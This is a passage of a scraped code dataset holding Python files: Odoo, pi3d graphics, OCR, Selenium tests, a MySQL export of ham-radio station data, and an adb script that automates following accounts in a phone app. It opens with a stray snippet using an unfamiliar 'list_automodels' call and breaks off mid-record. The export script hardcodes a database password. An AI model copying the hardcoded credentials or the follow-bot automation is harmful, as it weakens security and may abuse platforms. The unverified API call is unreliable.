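# to the Hugging Face Hub and pages through many models, so it can be slow.
for repo_id in list_automodels(task_filter=["text-classification"]):
    print(repo_id)
    break  # stop after the first match in this sketch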
([3] List of float64)\n - AgentVelocity ([3] List of float64)\n - AgentHeading (float64)\n - AgentBattery (float64)\n - AgentPayload (bool)\n :return: None\n ===========================================================\n \"\"\" \n self.agentId = agentId\n self.agentPos = agentPos\n self.agentHeading = agentHeading\n self.taskID = taskID\n self.taskStatus = taskStatus\n self.agentBattery = agentBattery\n self.agentPayload = agentPayload\n self.agentWorkingStatus = True\n self.lastReward = 0\n","repo_name":"742785334/mission_planning","sub_path":"scripts/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"10884052965","text":"from odoo import models\n\n\nclass StockPicking(models.Model):\n _inherit = 'stock.picking'\n\n def shipping_products(self):\n view_id = self.env.ref('prueba_tecnica_oz_solutions.shipping_products_view_form').id\n return {\n 'name': 'Enviar Productos',\n 'type': 'ir.actions.act_window',\n 'res_model': 'shipping.products',\n 'view_mode': 'form',\n 'view_id': view_id,\n 'views': [(view_id, 'form')],\n 'target': 'new',\n 'context': {\n 'default_stock_picking_id': self.id\n }\n }\n","repo_name":"CodigoByte2020/prueba_tecnica_oz_solutions","sub_path":"models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3095472623","text":"#!/usr/bin/env python\n'''\nThis script uses GitHub API to construct http_archive element to be inserted\ninto a federation client projects bazel WORKSPACE\n'''\nimport hashlib\nimport json\nimport urllib3\n\n_HEADERS = {'User-Agent': 'Workspace Updater'}\n\nhttp = urllib3.PoolManager()\n\n\nclass ExternalDependency(object):\n def workspace_rule(self):\n raise NotImplementedError('must implement workspace_rule()')\n\n\nclass GitHubProject(ExternalDependency):\n def __init__(self, name, owner, repo, branch):\n self.name = name\n self.owner = owner\n self.repo = repo\n self.branch = branch\n\n def workspace_rule(self):\n # https://developer.github.com/v3/repos/commits/\n url = f'https://api.github.com/repos/{self.owner}/{self.repo}/commits/{self.branch}'\n request = http.request('GET', url, headers=_HEADERS)\n response = json.loads(request.data.decode('utf-8'))\n commit = response[\"sha\"]\n date = response[\"commit\"][\"committer\"][\"date\"]\n\n url = f'https://github.com/{self.owner}/{self.repo}/archive/{commit}.zip'\n request = http.request('GET', url, headers=_HEADERS)\n sha256 = hashlib.sha256(request.data).hexdigest()\n return f\"\"\"\nhttp_archive(\n name = \"{self.name}\",\n sha256 = \"{sha256}\",\n strip_prefix = \"{self.repo}-{commit}\",\n urls = [\"{url}\"], # {date}\n)\"\"\"\n\n\nPROJECTS = [\n GitHubProject(\n name='com_google_absl_oss_federation',\n owner='abseil',\n repo='federation-head',\n branch='master',\n ),\n GitHubProject(\n name='com_googlesource_code_re2',\n owner='google',\n repo='re2',\n branch='abseil',\n ),\n]\n\nprint(\"********** INSERT THIS INTO YOUR WORKSPACE: *****************\")\nfor project in PROJECTS:\n print(project.workspace_rule())\nprint(\"*********************************\")\n","repo_name":"greasypizza/rgxr","sub_path":"head_sync.py","file_name":"head_sync.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6239832460","text":"from __future__ 
import absolute_import, division, print_function, unicode_literals\n\nfrom pi3d.Buffer import Buffer\nfrom pi3d.Shape import Shape\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\nclass Segment(object):\n # use class for tidiness, r,s,t,u are corners of polygon representing a line segment\n r = []\n s = []\n t = []\n u = []\n a = 0.0 # line equation gradient (for calc intersections of corners)\n cr = 0.0 # right side line equation const (i.e. in eq of line y = ax + c)\n cs = 0.0 # left side const\n\nclass PolygonLines(Shape):\n \"\"\" 3d model inherits from Shape\"\"\"\n def __init__(self, camera=None, light=None, vertices=[], material=(1.0,1.0,1.0),\n line_width=1, closed=False, name=\"\", x=0.0, y=0.0, z=0.0,\n sx=1.0, sy=1.0, sz=1.0, rx=0.0, ry=0.0, rz=0.0,\n cx=0.0, cy=0.0, cz=0.0, strip=True):\n \"\"\"uses standard constructor for Shape extra Keyword arguments:\n\n *vertices*\n array of tuples [(x0,y0,z0),(x1,y1,z1)..]\n *material*\n tuple (r,g,b)\n *line_width*\n set to 1 if absent or set to a value less than 1\n *closed*\n joins up last leg i.e. for polygons - only used for strip\n *strip*\n use GL_LINE_STRIP otherwise GL_LINES - needs pairs for line ends\n \"\"\"\n super(PolygonLines, self).__init__(camera, light, name, x, y, z, rx, ry, rz,\n sx, sy, sz, cx, cy, cz)\n\n LOGGER.debug(\"Creating PolygonLines ...\")\n\n segs = []\n hw = line_width * 0.5 # half width\n step = 1 if strip else 2\n n_v = len(vertices) if closed else len(vertices) - 1\n for i in range(0, n_v, step): #TODO non strip version\n i_next = (i + 1) % len(vertices) # i.e. wrap to first if closed\n ((x0, y0, z0), (x1, y1, z1)) = (vertices[i], vertices[i_next])\n (dx, dy) = (x1 - x0, y1 - y0)\n dlen = (dx ** 2 + dy ** 2) ** 0.5\n (dx, dy) = (dx / dlen, dy / dlen) # normalised vec along segment\n seg = Segment() # for convenient notation\n seg.r = [x0 + dy * hw, y0 - dx * hw, z0] # points to either side of line ends\n seg.s = [x0 - dy * hw, y0 + dx * hw, z0]\n seg.t = [x1 + dy * hw, y1 - dx * hw, z1]\n seg.u = [x1 - dy * hw, y1 + dx * hw, z1]\n seg.a = dy / dx if dx != 0 else 1000000.0\n seg.cr = seg.r[1] - seg.r[0] * seg.a\n seg.cs = seg.s[1] - seg.s[0] * seg.a\n segs.append(seg)\n if strip:\n new_verts = [segs[0].r[:], segs[0].s[:]] # first pair vertex\n n_s = len(segs) if closed else len(segs) - 1\n for i in range(n_s): # calculate intersection points for extension\n i_next = (i + 1) % len(segs) # i.e. 
wrap for closed\n da = segs[i].a - segs[i_next].a\n if abs(da) < 0.0001: # either straight or doubling back\n new_verts.extend([segs[i].t, segs[i].u])\n else:\n dc = segs[i_next].cr - segs[i].cr # far end right\n new_verts.append([dc / da, segs[i].a * dc / da + segs[i].cr, segs[i].t[2]])\n dc = segs[i_next].cs - segs[i].cs # far end left\n new_verts.append([dc / da, segs[i].a * dc / da + segs[i].cs, segs[i].u[2]])\n if not closed:\n new_verts.extend([segs[-1].t, segs[-1].u]) # last pair vertex\n else:\n new_verts[1] = new_verts[-1][:]\n new_verts[0] = new_verts[-2][:]\n n = len(new_verts) - 2\n indices = [[i+u, i+v, i+w] for i in range(0, n, 2)\n for (u, v, w) in [(0, 1, 3), (3, 2, 0)]]\n else: # simpler for non-strip\n new_verts = []\n for seg in segs:\n new_verts.extend([seg.r, seg.s, seg.t, seg.u])\n indices = [[i+u, i+v, i+w] for i in range(0, len(new_verts), 4)\n for (u, v, w) in [(0,1,3), (3,2,0)]]\n\n # UV mapped to vertex locations\n min_x = min((i[0] for i in new_verts))\n max_x = max((i[0] for i in new_verts))\n min_y = min((i[1] for i in new_verts))\n max_y = max((i[1] for i in new_verts))\n x_range = max_x - min_x\n y_range = max_y - min_y\n texcoords = [[(i[0] - min_x) / x_range, 1.0 - (i[1] - min_y) / y_range] for i in new_verts]\n # need normals if using texcoords\n normals = [[0.0, 0.0, -1.0] for i in range(len(new_verts))]\n\n self.buf = [Buffer(self, new_verts, texcoords, indices, normals, smooth=False)]\n self.set_material(material)","repo_name":"tipam/pi3d","sub_path":"pi3d/shape/PolygonLines.py","file_name":"PolygonLines.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"40"} +{"seq_id":"37222144176","text":"import cv2\nimport pytesseract\n\n\ndef ocr(image, platePath):\n\n\tplate = cv2.imread(platePath)\n\ttext = pytesseract.image_to_string(plate , lang='eng')\n\tprint(text)\n\n\tcv2.putText(image,text, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, 255,2)\n\t","repo_name":"arpitj07/Licence-Plate-Recognition-OpenCV","sub_path":"OCR.py","file_name":"OCR.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14767732326","text":"import sys\nimport distributedIGAlgorithm\n\n\ndef rebuildString(tasks, startNum):\n newString = \"\"\n for taskNum in range(startNum, len(tasks)):\n newString += tasks[taskNum] + \"\\n\"\n\n return newString\n\nfile = open(\"/media/napster/data/train/informationGain/aboveZero.txt\", 'r')\ntasks = file.readlines()\nfile.close()\n\nendList = []\n\nbatch = []\nstart = 1\nfor taskNum in range(start, len(tasks)):\n task = list(eval(tasks[taskNum]))\n batch.append(task)\n if taskNum % 100 == 0 and taskNum != start:\n new = distributedIGAlgorithm.runProcessBacklogItem(batch, taskNum-99)\n batch = []\n print(str(taskNum))\n\n\n\n","repo_name":"ndrabins/malifier","sub_path":"localIGRun.py","file_name":"localIGRun.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36075445598","text":"#!/usr/bin/env python3\nimport string\nfrom collections import OrderedDict\nimport shutil,os\nimport mysql.connector\nimport pandas as pd\n\nimport seqp\n\npd.set_option('display.max_rows', 1000)\npd.set_option('display.width', 1000)\npd.set_option('display.max_columns', 500)\n\ndef update_call(df,submitter_id,callsign):\n tf = df['submitter_id'] == submitter_id\n df.loc[tf,'callsign'] = 
[callsign]\n return df\n\ndef delete_station(df,submitter_id):\n tf = df['submitter_id'] != submitter_id\n df = df[tf].copy()\n return df\n\ndef grid_case(grid):\n \"\"\"\n Correct case of grid sqaures.\n \"\"\"\n try:\n grid = grid[:2].upper() + grid[2:]\n grid = grid[:-2] + grid[-2:].lower()\n except:\n pass\n return grid\n\n\ndef format_filename(s):\n \"\"\"Take a string and return a valid filename constructed from the string.\nUses a whitelist approach: any characters not present in valid_chars are\nremoved. Also spaces are replaced with underscores.\n \nNote: this method may produce invalid filenames such as ``, `.` or `..`\nWhen I use this method I prepend a date string like '2009_01_15_19_46_32_'\nand append a file extension like '.txt', so I avoid the potential of using\nan invalid filename.\n \n\"\"\"\n s = s.replace('/','-')\n valid_chars = \"-_.() %s%s\" % (string.ascii_letters, string.digits)\n filename = ''.join(c for c in s if c in valid_chars)\n filename = filename.replace(' ','_') # I don't like spaces in filenames.\n return filename\n\ndef clean_call(callsign):\n call = callsign.split()[0].replace('/','-')\n return call\n\nlog_dir = 'log_files'\nif os.path.exists(log_dir):\n shutil.rmtree(log_dir)\nos.makedirs(log_dir)\n\ndsn_dir = 'station_descriptions'\nif os.path.exists(dsn_dir):\n shutil.rmtree(dsn_dir)\nos.makedirs(dsn_dir)\n\nuser = 'hamsci'\npassword = 'hamsci'\nhost = 'localhost'\ndatabase = 'hamsci_rsrch'\ndb = mysql.connector.connect(user=user,password=password,host=host,database=database,buffered=True,use_pure=True)\n\n#cols = []\n#cols.append('submitter_id')\n#cols.append('has_multi')\n#cols.append('first_name')\n#cols.append('last_name')\n#cols.append('is_multi')\n#cols.append('club_name')\n#cols.append('callsign')\n#cols.append('email')\n#cols.append('per_gs')\n#cols.append('radio_model')\n#cols.append('power')\n#cols.append('is_tot')\n#cols.append('is_out')\n#cols.append('is_pub')\n#cols.append('ground_conductivity')\n#cols.append('submitted_log')\n#cols.append('submitted_dsn')\n#cols.append('log_fname')\n#cols.append('dsn_fname')\n#cols.append('comment')\n#cols.append('entered')\n#qry = (\"SELECT {!s} FROM seqp_submissions;\".format(','.join(cols)))\n\nqry = (\"SELECT * FROM seqp_submissions;\")\ncrsr = db.cursor()\ncrsr.execute(qry)\nresults = crsr.fetchall()\ncolumns = crsr.column_names\ncrsr.close()\n\ncols = OrderedDict()\ncols['submitter_id'] = 'submitter_id'\ncols['callsign'] = 'callsign'\ncols['per_gs'] = 'gridsquare_submitted'\ncols['lat_calculated'] = 'lat_calculated'\ncols['lon_calculated'] = 'lon_calculated'\ncols['radio_model'] = 'radio_model'\ncols['power'] = 'tx_power_watts'\ncols['log_fname'] = 'log_filename'\ncols['dsn_fname'] = 'station_description_filename'\n#cols['entered'] = 'entered'\n\nkeys = dict(zip(columns,range(len(columns))))\ndf_lst = []\n\nlog_files = {}\ndsn_files = {}\nfor result in results:\n tmp = {}\n for col in cols.keys():\n if col in ['lat_calculated','lon_calculated']:\n tmp[col] = 'NaN'\n else:\n tmp[col] = result[keys[col]]\n df_lst.append(tmp)\n\n sId = result[keys['submitter_id']]\n dsn_files[sId] = result[keys['submitted_dsn']]\n log_files[sId] = result[keys['submitted_log']]\n\n\ndf = pd.DataFrame(df_lst)\ndf = df[list(cols.keys())].copy()\n\n# Remove log filenames for IDs <= 293 due to a collection bug.\ntf = df.submitter_id <= 293\ndf.loc[tf,'log_fname'] = None\n\n\n# Capitalize\ndf['callsign'] = df['callsign'].apply(lambda x: x.upper())\n\n# Drop duplicates based on callsign (keep last/most up-to-date 
entry)\ndf = df.drop_duplicates('callsign',keep='last')\n\n# Fix obvious errors.\nupdate_call(df,382,'W0ECC')\nupdate_call(df,968,'WG4FOC')\nupdate_call(df,881,'AF0E7')\nupdate_call(df,332,'AC0PR')\nupdate_call(df,344,'N0UV')\nupdate_call(df,542,'K0VH')\nupdate_call(df,774,'WB0IXV')\n\n# Delete ones we know are wrong and have no chance of being helpful.\ndf = delete_station(df,171)\ndf = delete_station(df,32)\ndf = delete_station(df,785)\ndf = delete_station(df,527)\n\n# Calculate Grid Square\ndf_lst = []\nfor rinx,row in df.iterrows():\n row['per_gs'] = grid_case(row['per_gs'])\n\n try:\n latlon = seqp.locator.gridsquare2latlon(row['per_gs'])\n row['lat_calculated'] = '{:.04f}'.format(latlon[0])\n row['lon_calculated'] = '{:.04f}'.format(latlon[1])\n except:\n pass\n df_lst.append(row)\ndf = pd.DataFrame(df_lst)\n\n# Reset the index\ndf = df.sort_values('callsign')\ndf.index = range(len(df))\ndf_lst = []\nfor rinx,row in df.iterrows():\n callsign = clean_call(row['callsign'])\n pfx = '{:03d}_{!s}'.format(rinx,callsign)\n sId = row['submitter_id']\n log_fname = row['log_fname']\n log_file = log_files[sId]\n\n if log_fname is not None:\n fname = format_filename('{!s}_{!s}'.format(pfx,log_fname))\n fpath = os.path.join(log_dir,fname)\n row['log_fname'] = fname\n print(fpath)\n with open(fpath,'wb') as fl:\n fl.write(log_file)\n\n dsn_fname = row['dsn_fname']\n dsn_file = dsn_files[sId]\n\n if dsn_fname is not None:\n fname = format_filename('{!s}_{!s}'.format(pfx,dsn_fname))\n fpath = os.path.join(dsn_dir,fname)\n row['dsn_fname'] = fname\n print(fpath)\n with open(fpath,'wb') as fl:\n fl.write(dsn_file)\n df_lst.append(row)\n\ndf = pd.DataFrame(df_lst)\ndf = df[list(cols.keys())].copy()\ndf.index.name = 'index'\n\ndel df['submitter_id']\ndf = df.rename(columns=cols)\ndf.to_csv('station_info.csv')\nimport ipdb; ipdb.set_trace()\n","repo_name":"HamSCI/seqp-scoring","sub_path":"zenodo/write_operator_info.py","file_name":"write_operator_info.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43129160905","text":"import Tkinter, tkFont, Pmw, os, os.path, sys\nfrom tkFileDialog import askopenfilename, askdirectory,\\\n asksaveasfilename\nfrom tkMessageBox import showerror, showinfo, Message,\\\n askquestion\nfrom pfmfind.GUI.view import View\nfrom pfmfind.GUI.optionmenu import OptionMenu\n\n_FIXED_RANGE = True # Allow only lengths from 6 to 20\n\n\nclass SettingsView(Tkinter.Frame, View):\n def __init__(self, parent, PFMF_client, update_func):\n self.parent = parent\n Tkinter.Frame.__init__(self, parent)\n self.pack_propagate(0)\n\n self.PFMF_client = PFMF_client\n self.update_func = update_func\n\n # ************************************************************\n # ******* Database Settings **********************************\n # ************************************************************\n\n self.wDbGrp = Pmw.Group(self, tag_text='Database Settings')\n self.wDbGrp.pack(anchor='nw', fill='x', padx=5, pady=7)\n\n w = Tkinter.Frame(self.wDbGrp.interior())\n w.pack(anchor='w')\n\n Tkinter.Label(w, text=\"PostgreSQL Driver:\").grid(row=0,\\\n column=0, padx=5, pady=5, sticky='w')\n self.wDriverMenu = OptionMenu(w, items=['psycopg2'],\n menubutton_width=20,\n menu_font=self.ffont,\n menubutton_font=self.ffont)\n self.wDriverMenu.grid(row=0, column=1, padx=5, pady=5, sticky='w')\n\n Tkinter.Label(w, text=\"Database:\").grid(row=0, column=2, padx=5,\n pady=5, sticky='w')\n self.wDbEntry = 
Pmw.EntryField(w, entry_width = 25,\n entry_font=self.ffont)\n self.wDbEntry.grid(row=0, column=3, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Host:\").grid(row=2, column=0, padx=5,\n pady=5, sticky='w')\n self.wHostEntry = Pmw.EntryField(w, entry_width = 30,\n entry_font=self.ffont)\n self.wHostEntry.grid(row=2, column=1, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Port:\").grid(row=2, column=2, padx=5,\n pady=5, sticky='w')\n self.wPortEntry = Pmw.EntryField(w, entry_width =10,\n entry_font=self.ffont)\n self.wPortEntry.grid(row=2, column=3, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"User:\").grid(row=4, column=0, padx=5,\n pady=5, sticky='w')\n self.wUserEntry = Pmw.EntryField(w, entry_width =25,\n entry_font=self.ffont)\n self.wUserEntry.grid(row=4, column=1, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Password:\").grid(row=4, column=2,\n padx=5, pady=5,\n sticky='w')\n self.wPswdEntry = Pmw.EntryField(w, entry_width =25,\n entry_show=\"*\",\n entry_font=self.ffont)\n self.wPswdEntry.grid(row=4, column=3, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Dataset schema:\").grid(row=6, column=0,\n padx=5, pady=5,\n sticky='w')\n\n self.wDSEntry = Pmw.EntryField(w, entry_width =25,\n entry_font=self.ffont)\n self.wDSEntry.grid(row=6, column=1, padx=5, pady=5,\n sticky='w')\n Tkinter.Label(w, text=\"PFMFind schema:\").grid(row=6, column=2,\n padx=5, pady=5,\n sticky='w')\n self.wPSEntry = Pmw.EntryField(w, entry_width =25,\n entry_font=self.ffont)\n self.wPSEntry.grid(row=6, column=3, padx=5, pady=5,\n sticky='w')\n\n self.wDbButFrm = Tkinter.Frame(w)\n self.wDbButFrm.grid(row=8, column=0, columnspan=2,\n padx=5, pady=10, sticky='we')\n\n self.wDbClrBut = Tkinter.Button(self.wDbButFrm,\n text='Reset',\n command=self._reset_db)\n self.wDbClrBut.pack(side='left', padx=10)\n self.wDbConBut = Tkinter.Button(self.wDbButFrm,\n text='Connect',\n command=self._connect_db)\n self.wDbConBut.pack(side='left', padx=10)\n self.wDbDisBut = Tkinter.Button(self.wDbButFrm,\n text='Disconnect',\n command=self._disconnect_db)\n self.wDbDisBut.pack(side='left', padx=10)\n\n\n # ************************************************************\n # ******* Index Settings *************************************\n # ************************************************************\n\n self.wIndexGrp = Pmw.Group(self, tag_text='Index Settings')\n self.wIndexGrp.pack(anchor='nw', padx=5, pady=7, fill='x')\n\n w = Tkinter.Frame(self.wIndexGrp.interior())\n w.pack(anchor='w')\n\n Tkinter.Label(w, text=\"Host:\").grid(row=0,\n column=0, padx=5,\n pady=5, sticky='w')\n self.wIxHostEntry = Pmw.EntryField(w, entry_width=30,\n entry_font=self.ffont)\n self.wIxHostEntry.grid(row=0, column=1, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Port:\").grid(row=0, column=2, padx=5,\n pady=5, sticky='w')\n self.wIxPortEntry = Pmw.EntryField(w, entry_width=10,\n entry_font=self.ffont)\n self.wIxPortEntry.grid(row=0, column=3, padx=5, pady=5,\n sticky='w')\n\n\n self.wIxButFrm = Tkinter.Frame(w)\n self.wIxButFrm.grid(row=2, column=0, columnspan=2,\n padx=5, pady=10, sticky='we')\n\n self.wIxClrBut = Tkinter.Button(self.wIxButFrm,\n text='Reset',\n command=self._reset_ix)\n self.wIxClrBut.pack(side='left', padx=10)\n self.wIxConBut = Tkinter.Button(self.wIxButFrm,\n text='Connect',\n command=self._connect_ix)\n self.wIxConBut.pack(side='left', padx=10)\n self.wIxDisBut = Tkinter.Button(self.wIxButFrm,\n text='Disconnect',\n command=self._disconnect_ix)\n 
self.wIxDisBut.pack(side='left', padx=10)\n\n\n\n # ************************************************************\n # ******* Plugin Settings ************************************\n # ************************************************************\n\n self.wPluginGrp = Pmw.Group(self, tag_text='Plugin Settings')\n self.wPluginGrp.pack(anchor='nw', padx=5, pady=7, fill='x',\n expand=1)\n\n w = Tkinter.Frame(self.wPluginGrp.interior())\n w.pack(anchor='w')\n\n Tkinter.Label(w, text='Custom Plugin Path:').grid(row=0,\\\n column=0, padx=5, pady=5, sticky='w')\n\n self.wPlgPathEntry = Pmw.EntryField(w, entry_width=60,\n entry_font=self.ffont)\n self.wPlgPathEntry.grid(row=0, column=1, padx=5, pady=5,\n sticky='w')\n\n self.wPlgPathBut = Tkinter.Button(w, text='Choose...',\\\n width=5, command=self._set_plugin_path)\n self.wPlgPathBut.grid(row=0, column=3, padx=5, pady=5,\n sticky='w')\n\n self.wPlButFrm = Tkinter.Frame(w)\n self.wPlButFrm.grid(row=2, column=0, columnspan=2,\n padx=5, pady=10, sticky='we')\n\n self.wPlClrBut = Tkinter.Button(self.wPlButFrm,\n text='Reset',\n command=self._reset_pl)\n self.wPlClrBut.pack(side='left', padx=10)\n self.wPlSetBut = Tkinter.Button(self.wPlButFrm,\n text='Set',\n command=self._set_pl)\n self.wPlSetBut.pack(side='left', padx=5)\n\n # ************************************************************\n # ******* Load/Save buttons **********************************\n # ************************************************************\n\n self.wLoad = Tkinter.Button(self, text='Load Settings...',\n command=self._load)\n self.wLoad.pack(side='left', anchor='nw', padx=5, pady=5)\n\n self.wSave = Tkinter.Button(self, text='Save Current Settings...',\n command=self._save)\n self.wSave.pack(side='right', anchor='ne', padx=5, pady=5)\n\n\n # Update the form\n self._db_form = {'db': self.wDbEntry, 'host': self.wHostEntry,\n 'port': self.wPortEntry, 'user': self.wUserEntry,\n 'password': self.wPswdEntry}\n\n\n self.update()\n\n def _reset_db(self):\n if self.PFMF_client.driver:\n self.wDriverMenu.setvalue(self.PFMF_client.driver)\n else:\n self.wDriverMenu.invoke(0)\n\n for k, v in self._db_form.iteritems():\n if k in self.PFMF_client.dbargs:\n self._db_form[k].setvalue(self.PFMF_client.dbargs[k])\n else:\n self._db_form[k].setvalue('')\n\n if self.PFMF_client.db_schema:\n self.wDSEntry.setvalue(self.PFMF_client.db_schema)\n else:\n self.wDSEntry.setvalue('')\n\n if self.PFMF_client.PFMF_schema:\n self.wPSEntry.setvalue(self.PFMF_client.PFMF_schema)\n else:\n self.wPSEntry.setvalue('')\n\n def _connect_db(self):\n dbargs = dict()\n\n s = self.wPortEntry.getvalue().strip()\n if len(s):\n try:\n port = int(s)\n except ValueError:\n showerror('Input Error', 'Port must be a number.',\n parent=self.parent)\n return\n dbargs['port'] = s\n\n dbargs['driver'] = self.wDriverMenu.getvalue()\n\n s = self.wDbEntry.getvalue().strip()\n if len(s):\n dbargs['db'] = s\n\n s = self.wHostEntry.getvalue().strip()\n if len(s):\n dbargs['host'] = s\n\n s = self.wUserEntry.getvalue().strip()\n if len(s):\n dbargs['user'] = s\n s = self.wPswdEntry.getvalue().strip()\n if len(s):\n dbargs['password'] = s\n\n try:\n self.PFMF_client.open(**dbargs)\n except:\n showerror('Connection Error', 'Could not connect to' \\\n ' PostgreSQL database.',\n parent=self.parent)\n return\n\n schemata = dict()\n s = self.wDSEntry.getvalue().strip()\n if len(s):\n schemata['db_schema'] = s\n s = self.wPSEntry.getvalue().strip()\n if len(s):\n schemata['PFMF_schema'] = s\n try:\n self.PFMF_client.set_schema(**schemata)\n 
except:\n showerror('Connection Error', 'Could not initialise the' \\\n ' given\\n or default database schemata.',\n parent=self.parent)\n self.PFMF_client.close()\n return\n\n self.update()\n\n def _disconnect_db(self):\n self.PFMF_client.close()\n self.update()\n\n\n def _reset_ix(self):\n if self.PFMF_client.host:\n self.wIxHostEntry.setvalue(self.PFMF_client.host)\n else:\n self.wIxHostEntry.setvalue('')\n if self.PFMF_client.port:\n self.wIxPortEntry.setvalue(str(self.PFMF_client.port))\n else:\n self.wIxPortEntry.setvalue('')\n\n def _connect_ix(self):\n host = self.wIxHostEntry.getvalue().strip()\n port = self.wIxPortEntry.getvalue().strip()\n\n try:\n port = int(port)\n except ValueError:\n showerror('Input Error', 'Port must be a number.',\n parent=self.parent)\n return\n\n if not self.PFMF_client.attach(host, port):\n showerror('Connection Error', 'Could not connect to' \\\n ' FSIndex server\\n at %s:%s.' % (host, port),\n parent=self.parent)\n return\n self.update()\n\n def _disconnect_ix(self):\n self.PFMF_client.detach()\n self.update()\n\n def _set_plugin_path(self):\n path = askdirectory(mustexist=1,\n parent = self.parent,\n title = 'Choose Plugin Directory',\n initialdir=os.getcwd(),\n )\n if path == ():\n return\n self.wPlgPathEntry.setvalue(path)\n\n def _reset_pl(self):\n if self.PFMF_client.plugin_dir:\n self.wPlgPathEntry.setvalue(self.PFMF_client.plugin_dir)\n else:\n self.wPlgPathEntry.setvalue('')\n\n def _set_pl(self):\n path = self.wPlgPathEntry.getvalue()\n if not os.path.isdir(path):\n showerror('Input Error', 'Invalid plugin path.',\n parent=self.parent)\n return\n self.PFMF_client.init_plugins(path)\n\n def _load(self):\n path = askopenfilename(defaultextension='.xml',\n filetypes=[('XML File','.xml')],\n parent = self.parent,\n title = 'Choose Settings File',\n initialdir=os.getcwd())\n if not len(path): return\n fp = file(path, 'r')\n self.PFMF_client.read_config(fp)\n fp.close()\n self.update()\n\n def _save(self):\n path = asksaveasfilename(defaultextension='.xml',\n filetypes=[('XML File','.xml')],\n parent = self.parent,\n title = 'Choose Settings File',\n initialdir=os.getcwd())\n if path == (): return\n fp = file(path, 'w')\n self.PFMF_client.write_config(fp)\n fp.close()\n\n\n def update(self):\n self._reset_db()\n self._reset_ix()\n self._reset_pl()\n\n if self.PFMF_client.conn:\n self.wDbConBut.configure(state='disabled')\n self.wDbDisBut.configure(state='normal')\n self.wLoad.configure(state='disabled')\n\n if self.PFMF_client.host and self.PFMF_client.port:\n self.wDbDisBut.configure(state='disabled')\n self.wIxConBut.configure(state='disabled')\n self.wIxDisBut.configure(state='normal')\n else:\n self.wIxConBut.configure(state='normal')\n self.wIxDisBut.configure(state='disabled')\n\n else:\n self.wDbConBut.configure(state='normal')\n self.wDbDisBut.configure(state='disabled')\n self.wLoad.configure(state='normal')\n self.wIxConBut.configure(state='disabled')\n self.wIxDisBut.configure(state='disabled')\n\n self.update_func()\n","repo_name":"astojmir/PFMFind","sub_path":"pfmfind/GUI/settings_view.py","file_name":"settings_view.py","file_ext":"py","file_size_in_byte":15837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71135319161","text":"import unittest\nfrom selenium import webdriver\n\n\nclass TestPrueba(unittest.TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome(\"chromedriver\")\n\n def tearDown(self):\n self.browser.close()\n\n def 
test_texto_barra_busqueda_despues_de_buscar(self):\n        self.browser.get(\"https://www.google.com\")\n        #name=\"q\"\n        barra_busqueda = self.browser.find_element_by_name(\"q\")\n        barra_busqueda.send_keys(\"django docs\")\n        #name=\"btnK\"\n        boton_buscar = self.browser.find_element_by_name(\"btnK\")\n        #sleep(5)\n        self.browser.implicitly_wait(5)\n        boton_buscar.click() \n\n        barra_busqueda = self.browser.find_element_by_name(\"q\")\n        texto = barra_busqueda.get_property(\"value\")\n        self.assertEqual(texto, \"django docs\")\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"enzostefani507/python-info","sub_path":"Test/test_selenium.py","file_name":"test_selenium.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"30825926740","text":"from adb import adb\nimport os, argparse, time\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\n\nphone = adb()\n\n\ndef parse_layout():\n    xml_string = phone.dump_layout()\n    try:\n        root = ET.fromstring(xml_string)\n    except Exception as e:\n        print(\"error reading layout: %s\" % str(e))\n        return None\n    return root\n\ndef find_coordinates(root, attribute, text):\n\tfor i in root.iter(\"node\"):\n\t\tif i.attrib[attribute] and i.attrib[attribute] == text:\n\t\t\tbounds = i.get(\"bounds\")\n\t\t\ta = bounds.split(\"[\")\n\t\t\tx = int(a[1].split(\",\")[0])\n\t\t\ta = bounds.split(\"]\")\n\t\t\ty = int(a[0].split(\",\")[1])\n\t\t\treturn (x,y)\n\treturn (-1, -1)\n\ndef follow_account(account):\n\t#press Search and Explore to find the account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"content-desc\", \"Search and Explore\")\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\n\t#press Search and enter account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"text\", \"Search\")\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\t\tphone.input_text(account)\n\t\tphone.input_keyevent(66)\t\n\t\t\t\n\t#select the account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, 